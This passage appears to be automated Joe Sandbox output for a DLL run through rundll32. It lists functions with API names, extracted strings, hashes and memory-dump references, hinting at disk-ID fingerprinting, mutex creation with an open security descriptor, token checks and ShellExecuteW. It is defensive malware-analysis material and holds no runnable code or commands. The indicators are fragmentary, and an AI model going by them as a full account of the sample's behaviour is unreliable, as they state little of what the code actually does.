                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: wcsncmp$DirectoryPath
                                                                  • String ID: \\?\
                                                                  • API String ID: 911398208-4282027825
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFilePathSection$AppendEnterExistsLeaveModuleNamememset
                                                                  • String ID: ..\safemon\FreeSaaS.tpi
                                                                  • API String ID: 154803636-205188023
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000180056109
                                                                  • CreateMutexW.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005611D
                                                                  • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,000000018000BCF5,?,?,?,?,?,0000000180006143), ref: 000000018005612B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: DescriptorSecurity$ConvertCreateFreeLocalMutexString
                                                                  • String ID: D:P(OA;;FA;;;WD)
                                                                  • API String ID: 794372803-936388898
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5
                                                                  • _wcsicmp.MSVCRT ref: 000000018002AE4E
                                                                    • Part of subcall function 00000001800275E4: IIDFromString.OLE32(?,?,?,?,?,?,?,00000001800254CC), ref: 000000018002760B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FromHeapProcessString_wcsicmp
                                                                  • String ID: $CLSID$ftp:
                                                                  • API String ID: 2012545421-381575252
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitializeLeavefreemallocmemmove
                                                                  • String ID:
                                                                  • API String ID: 1740668140-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsicmp
                                                                  • String ID: ScriptEngine$ScriptHostEncode${0CF774D0-F077-11D1-B1BC-00C04F86C324}
                                                                  • API String ID: 2081463915-2936173157
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterInitializeLeave
                                                                  • String ID:
                                                                  • API String ID: 3991485460-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$freewcstol
                                                                  • String ID:
                                                                  • API String ID: 1017142431-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: String$??2@Free$??3@Alloc
                                                                  • String ID:
                                                                  • API String ID: 1832687772-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errno$freewcstol
                                                                  • String ID:
                                                                  • API String ID: 1017142431-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errno$freewcstol
                                                                  • String ID:
                                                                  • API String ID: 1017142431-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1717984340-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 000000018006A2B8: malloc.MSVCRT(?,?,?,0000000180069638), ref: 000000018006DF0A
                                                                    • Part of subcall function 000000018006A2B8: SetLastError.KERNEL32(?,?,?,0000000180069638), ref: 000000018006DF1B
                                                                    • Part of subcall function 000000018006A32C: CreateFileA.KERNEL32 ref: 000000018006A363
                                                                  • memset.MSVCRT ref: 000000018006C2AB
                                                                    • Part of subcall function 000000018006A2C8: DeviceIoControl.KERNEL32 ref: 000000018006A2F1
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000400,?,00000000,00002000,00000000,000000018006C06D), ref: 000000018006C308
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceErrorFileHandleLastmallocmemmovememset
                                                                  • String ID: DISKID:$\\.\PhysicalDrive%d
                                                                  • API String ID: 1541746987-3765948602
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: Delete
                                                                  • String ID:
                                                                  • API String ID: 1035893169-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                  • String ID:
                                                                  • API String ID: 772211780-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                  • String ID:
                                                                  • API String ID: 772211780-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: String$??3@Free$??2@AllocFileFindNamePath
                                                                  • String ID:
                                                                  • API String ID: 772211780-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CountTick$freemalloc
                                                                  • String ID:
                                                                  • API String ID: 112427268-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: CriticalSection$Initialize$DeleteEnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3345835275-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errno_msizememsetrealloc
                                                                  • String ID:
                                                                  • API String ID: 1716158884-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Similarity
                                                                  • API ID: _errno$memmovememset
                                                                  • String ID:
                                                                  • API String ID: 390474681-0
                                                                  • Opcode ID: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                  • Instruction ID: 14b1c1fe1981e25254dae316b1258392d266da5cf9c387dbe4ce1a9d85b7c1af
                                                                  • Opcode Fuzzy Hash: 34773165fa903b58a8169a26407c6ce6a53d95ed58fc80f98c13fe875aa60091
                                                                  • Instruction Fuzzy Hash: 2401D631B1469C42FAE66B56F0003EE5250AB8CBD0F48D020BF4557B8FCE2ECA968740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: CriticalSection$DeleteEnterFreeLeaveLibrary
• String ID:
• API String ID: 2347899730-0
• Opcode ID: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
• Instruction ID: 48e8189d87aa0b979fc36c7d6fe6748a55851d8ea4777fada0444d8c8a940578
• Opcode Fuzzy Hash: 8ca6170e5c17e41b4a506002b7f4800d109eeedd4070b7d9029d326942e7e76d
• Instruction Fuzzy Hash: 6E117033605B4897EB558F21E9443A97360FB4A7B5F1897249B690BAA0CF78D2798300
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: File_swprintf_c_l$PointerRead
• String ID:
• API String ID: 1259558433-0
• Opcode ID: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
• Instruction ID: 41788915f12d7117270c0c242483de8f49aba279d1603b6e07884f1d05f749b7
• Opcode Fuzzy Hash: 430f8c9727729296bcb3ae13e9e40dcee6c79fd9ad2c75f57ecad12c2e0545ef
• Instruction Fuzzy Hash: 9B01F53172864881F7929B61AC407DBA3A1F74D7C4F65C022FA5543A64CF3DC748CB20
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: memmove
• String ID:
• API String ID: 2162964266-0
• Opcode ID: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
• Instruction ID: 461c31f9552aa3729a5e6565f135de1ccc8cc925f396947b96927f6322aea50e
• Opcode Fuzzy Hash: f48e30d42f7362a3489efc8b4fb4b1d86e67ce5bf115bf63e3aa4bcefc4ad982
• Instruction Fuzzy Hash: A6014B72604B8486DA999F02B84439AA6A4F799FC0F58C034AF9A1BB1ACE7CC2518700
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: wcsncmp$FromListPath
• String ID: http://$https://
• API String ID: 1354619976-1916535328
• Opcode ID: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
• Instruction ID: 3b4f654c0190b1c660da69d9b707c9435e3e8476667423005c0f2b5f6a7ba28a
• Opcode Fuzzy Hash: f0180345e040584d079c5b24169db75a70be302b2ca9e14ca998ae6b14b2d4e5
• Instruction Fuzzy Hash: 21F06D30314B4D81FBD3AB22ED807E92361A74DBC0F08D026BE128B681EE29C79DC701
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: FilePath$BackslashModuleNameRemoveSpecmemmovememset
• String ID:
• API String ID: 1398880316-0
• Opcode ID: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
• Instruction ID: 22643bada24b11d976684183b583204a4ee84c872d42e87ba640a329a3643701
• Opcode Fuzzy Hash: 124879481a9aa2e00d01ebae9109725b2fe3f2f688dd831a4adbc46c5dd73c81
• Instruction Fuzzy Hash: 14015E71214A8882EA60DB21F85539A6320F78A7A9F404221BAAD476E9DF3DC24DCB04
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: __pctype_func
• String ID: (null)$(null)
• API String ID: 3630429742-1601437019
• Opcode ID: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
• Instruction ID: 4da43dc6e52408ab09b3749884352dd554f5e104f70e5d3a12e7d890f492f9a7
• Opcode Fuzzy Hash: 0065adc6453a10d9ccc5162ae3c07d97aa8578f8e3d986a6a80ec195f80303d0
• Instruction Fuzzy Hash: 0F81F07221068886FBEB8F2880523E967A1F749BD4F44D115FE4A57798DF3ECA89C700
Uniqueness

Uniqueness Score: -1.00%

APIs
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,0000000180042715), ref: 0000000180042D94
  • Part of subcall function 000000018001AD68: InitializeCriticalSection.KERNEL32(?,?,?,?,?,000000018001AFD5), ref: 000000018001ADCE
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: ByteCharCriticalInitializeMultiSectionWide
• String ID: Cache-Control: no-cache$Connection: Keep-Alive
• API String ID: 2071930665-2797312137
• Opcode ID: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
• Instruction ID: 06b1c2be51b69464b9694ee66dce0eee22d8a6c444c0793ba53430c965e4d999
• Opcode Fuzzy Hash: 390d372ab0f8ca9c8d35a5c5b59fa4f1daf8a60d35f223fc70caf0e07e2a75eb
• Instruction Fuzzy Hash: 6971B172300E9886EB96DF26D4807DD3760FB89BD8F86C625BE2947B85CF31D6598304
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: map/set<T> too long
• API String ID: 909987262-1285458680
• Opcode ID: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
• Instruction ID: b716ba77de4695a230c5cde56cb36caf30baef682964767987e615475274616d
• Opcode Fuzzy Hash: 4f8b5c4a4b7dfd174ba02e61296e3cf7ea921cc7912cdcef76d88542124505ce
• Instruction Fuzzy Hash: 17419E32208F8881EAA2CF25E84039E73A4F399BE0F558225EF9D43B95DF39C556C740
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: FileFindNamePathwcscmp
• String ID: RUNDLL32
• API String ID: 3222201028-252960710
• Opcode ID: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
• Instruction ID: 4f5a5794d41fc096d520f70cd288b3f3e4e93d0d03317b7f7fc332b0f1d573f2
• Opcode Fuzzy Hash: cb23065da29cb40e9b09dc38cb932cba9fa4c45224ed154b04bc2c1aad3b4612
• Instruction Fuzzy Hash: 87412932711A5896EB919F39C84479C2360FB49BB8F548312EA3D47BE9DF34CA99C344
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: EnvironmentExpandHeapProcessStringsmemset
• String ID: %userprofile%
• API String ID: 513494641-4287493773
• Opcode ID: 6171552488bcb95b8598f81a13bd2917bbfc5c9e60312d18e151e2b76805b3ef
• Instruction ID: afa807702e792aa2111ef114b343d602a6a47e8eed4e3e29c3f3eed9658e9f14
• Opcode Fuzzy Hash: 6171552488bcb95b8598f81a13bd2917bbfc5c9e60312d18e151e2b76805b3ef
• Instruction Fuzzy Hash: 86214A31311A4891EA92DB65EC853DA3360FB88BE4F419215A66D473E1DF38C7898700
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShellExecuteW.SHELL32 ref: 000000018004AF73
  • Part of subcall function 00000001800495A4: GetTickCount.KERNEL32 ref: 00000001800495AC
  • Part of subcall function 00000001800495A4: srand.MSVCRT ref: 00000001800495B4
  • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495BA
  • Part of subcall function 00000001800495A4: GetCurrentProcessId.KERNEL32 ref: 00000001800495CE
  • Part of subcall function 00000001800495A4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800495FA
  • Part of subcall function 00000001800495A4: GetTokenInformation.ADVAPI32 ref: 0000000180049629
  • Part of subcall function 00000001800495A4: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000180049636
  • Part of subcall function 00000001800495A4: GetLastError.KERNEL32 ref: 000000018004963F
  • Part of subcall function 00000001800495A4: GetSidSubAuthority.ADVAPI32 ref: 0000000180049658
  • Part of subcall function 00000001800495A4: ??_V@YAXPEAX@Z.MSVCRT ref: 000000018004967B
  • Part of subcall function 00000001800494C4: ??_U@YAPEAX_K@Z.MSVCRT ref: 00000001800494DA
• memset.MSVCRT ref: 000000018004AF8E
Strings
Memory Dump Source
• Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
• Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
Similarity
• API ID: AuthorityCountCurrentProcess$ErrorExecuteInformationLastShellTickTokenmemsetsrand
• String ID: p
• API String ID: 526592482-2181537457
• Opcode ID: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
• Instruction ID: c7a46caf8343ac9de693e6305f929c410170157657da93c1511d6525c5ccc842
• Opcode Fuzzy Hash: db20606bd2f8c5ddcc62ab015699e8350b9eea6392e973e239eb88e586f6bc5b
• Instruction Fuzzy Hash: B221B632208F8885E7A1DF51F48078AB3A4F799BC4F158021BE8D43B59DF38C549CB44
Uniqueness

Uniqueness Score: -1.00%

                                                                  APIs
